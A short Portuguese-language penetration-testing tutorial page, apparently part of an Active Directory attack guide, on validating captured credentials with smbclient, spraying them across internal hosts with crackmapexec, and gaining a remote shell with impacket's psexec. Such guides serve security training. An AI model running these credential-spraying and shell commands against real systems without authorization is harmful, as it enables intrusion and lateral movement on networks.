search

Validando as credenciais

Podemos agora utilizar as credenciais obtidas para tentarmos nos autenticar a alguns serviƧos.

$ smbclient -L \\<ip> -U <usuƔrio> -W <domƭnio>

Podemos utilizar o crackmapexec para automatizar a autenticaĆ§Ć£o de um usuĆ”rio e senha em vĆ”rios hosts.

$ cat hosts
172.16.1.253
172.16.1.243
172.16.1.245

$ crackmapexec smb <hosts> -d <domƭnio> -u <usuƔrio> -p '<senha>'

Podemos tambƩm utilizar o psexec para tentar ganhar uma shell com o usuƔrio e senha obtidos.

python3 /usr/share/doc/python3-impacket/examples/psexec.py <domƭnio>/<usuƔrio>:'<senha>'@<ip>

PreviousCapturando hashesNextEnumerando as contas do AD

Last updated